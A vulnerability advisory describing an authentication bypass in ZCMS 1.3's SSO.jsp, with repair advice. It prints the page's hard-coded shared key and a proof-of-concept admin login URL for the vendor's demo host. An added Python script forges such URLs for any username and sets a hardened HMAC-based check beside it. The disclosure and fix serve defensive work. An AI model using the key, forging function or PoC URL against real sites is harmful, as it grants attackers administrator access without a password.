ZCMS 1.3 final backend login verification bypass vulnerability and fix

2011-09-01T00:00:00
ID MYHACK58:62201131750
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-09-01T00:00:00

Description

Brief description: SSO.jsp contains a logic error in its single-sign-on check.

Detailed description: SSO.jsp logs a user in when a caller-supplied MD5 token matches the MD5 of the username, a caller-supplied timestamp and a secret that is hard-coded in the page itself. The key is the same in every installation and the timestamp is never checked for freshness, so anyone who has read the page source can forge a valid token for any username, including admin, and log in without a password:

<%
// Untrusted request parameters: username, timestamp and the token to verify
String username = request.getParameter("u");
String time = request.getParameter("t");
String str = request.getParameter("s");
// Secret shared by every ZCMS 1.3 install; visible to anyone with the source
String key = "WIU%&DJAJKL%^W(DLJIST";
// Expected token; "time" goes into the hash but its value is never validated, so any t works
String s = StringUtil.md5Hex(username + time + key);
if (s.equals(str)) {
    // Establishes a session for "username" with no password check at all
    Login.ssoLogin(request, response, username);
}
%>

Proof of concept (s is md5Hex("admin" + "1" + key), as computed by the page itself):

http://www.zving.com/demo/SSO.jsp?u=admin&t=1&s=ff1168b33fe9e33841bb9814c58a098d

Repair: delete the vulnerable SSO.jsp from the deployment. If single sign-on is actually required, the page has to be redesigned rather than restored as-is: derive the token from a per-installation secret that is not embedded in the page (an HMAC rather than a bare MD5 of a concatenation), reject timestamps outside a short window so captured URLs expire, refuse to redeem the same token twice, and compare tokens in constant time instead of String.equals.
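The following Python script is an added example, not code from ZCMS or from the advisory author. It mirrors the SSO.jsp check, forges the login URL the way the proof of concept does (any attacker-chosen t yields a valid s), and places beside it a hardened check with a per-installation HMAC secret, a freshness window and a replay cache. The class name HardenedSSO, the 60 second window, the length-prefixed message encoding and the in-memory replay set are assumptions of this example, not a vendor patch.

```python
"""Token forging against SSO.jsp and a hardened replacement check.

Added example, not ZCMS code. vulnerable_sso_check mirrors the JSP shown in
the advisory; HardenedSSO is a suggested design, not a vendor patch, and the
per-install secret, 60 second window and replay cache are assumptions.
"""
import hashlib
import hmac
import secrets
import time
from typing import Optional, Set, Tuple

# Key copied verbatim from SSO.jsp: it ships identically in every ZCMS 1.3 install.
ZCMS_KEY = "WIU%&DJAJKL%^W(DLJIST"


def zcms_token(username: str, t: str, key: str = ZCMS_KEY) -> str:
    """Exactly what SSO.jsp computes: md5Hex(username + time + key)."""
    return hashlib.md5((username + t + key).encode("utf-8")).hexdigest()


def vulnerable_sso_check(u: str, t: str, s: str) -> bool:
    """Mirror of the JSP: shared key, t never validated, plain string compare."""
    return zcms_token(u, t) == s


def forge_login_url(base: str, username: str, t: str = "1") -> str:
    """What an attacker who has read the page source does: pick any t, derive s."""
    return f"{base}?u={username}&t={t}&s={zcms_token(username, t)}"


class HardenedSSO:
    """Suggested replacement: per-install HMAC secret, freshness window, replay cache."""

    def __init__(self, secret: bytes, max_skew: int = 60) -> None:
        self.secret = secret                      # generated at install time, never in a .jsp
        self.max_skew = max_skew                  # seconds a token stays redeemable
        self.seen: Set[Tuple[str, str]] = set()   # (username, t) pairs already redeemed

    def token(self, username: str, t: str) -> str:
        # Length-prefix the username so "admin"+"1" cannot collide with "admi"+"n1".
        msg = f"{len(username)}:{username}|{t}".encode("utf-8")
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def check(self, u: str, t: str, s: str, now: Optional[int] = None) -> bool:
        now = int(time.time()) if now is None else now
        # Reject non-numeric, stale or future timestamps before touching the secret.
        try:
            issued = int(t)
        except ValueError:
            return False
        if abs(now - issued) > self.max_skew:
            return False
        # One redemption per (user, timestamp): stops replay of a captured URL inside the window.
        if (u, t) in self.seen:
            return False
        # Constant-time compare on bytes so attacker-controlled length or encoding cannot leak.
        if not hmac.compare_digest(self.token(u, t).encode("ascii"), s.encode("utf-8")):
            return False
        self.seen.add((u, t))
        return True


if __name__ == "__main__":
    url = forge_login_url("http://www.zving.com/demo/SSO.jsp", "admin")
    print("forged:", url)
    # Recompute the proof-of-concept token for u=admin&t=1 and compare with the published one.
    print("matches published PoC token:",
          zcms_token("admin", "1") == "ff1168b33fe9e33841bb9814c58a098d")
    sso = HardenedSSO(secrets.token_bytes(32))
    now_t = str(int(time.time()))
    fresh = sso.token("admin", now_t)
    print("hardened accepts fresh token:", sso.check("admin", now_t, fresh))
    print("hardened rejects replay:", sso.check("admin", now_t, fresh))
```

Running the script prints a forged admin URL for the demo host and reports whether the recomputed token equals the one in the proof of concept; the hardened check shows the same captured token being accepted once and then refused. In a real deployment the replay set would live in shared storage (or the timestamp would be paired with a server-issued nonce) so that the check survives restarts and multiple application nodes.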

Vulnerability author: tnt1200